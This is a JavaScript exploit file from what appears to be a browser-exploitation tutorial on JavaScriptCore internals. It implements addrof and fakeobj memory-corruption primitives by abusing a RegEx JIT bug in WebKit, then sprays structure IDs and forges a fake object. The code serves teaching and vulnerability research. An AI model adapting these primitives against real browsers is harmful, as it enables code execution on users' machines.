Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06

test.js

// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

// addrof primitive
function addrof(val) {
    var array = [13.37];
    var reg = /abc/y;
        
    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    }
    
    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);
    
    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;
    
    // Do it!
    return AddrGetter(array);
}

// fakeobj primitive
function fakeobj(dbl) {
    var array = [13.37];
    var reg = /abc/y;
        
    // Target function
    var AddrSetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        array[0] = dbl;
    }
    
    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrSetter(array);
    
    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = {};
        return "0";
    };
    reg.lastIndex = regexLastIndex;
    
    // Do it!
    AddrSetter(array);
    return array[0];
}

for(var i=0; i<0x2000; i++) {
    test = []
    test.x = 1
    test['prop_'+i] = 2
}

buf = new ArrayBuffer(8);
u32 = new Uint32Array(buf);
f64 = new Float64Array(buf);

fake = {}
//fake.a = 7.082855106403439e-304
u32[0] = 0x00001000 // StructureID
u32[1] = 0x01082103 // JSCellHeader flags
fake.a = f64[0]
u32[0] = 0x41414141 // butterfly
u32[1] = 0x42424242
fake.b = f64[0]
fake.c = 1337

fake_adr = addrof(fake)
f64[0] = fake_adr
u32[0] += 0x10 // shift address forward by 16 bytes
hax_addr = f64[0]
hax = fakeobj(hax_addr)
print(hax.length)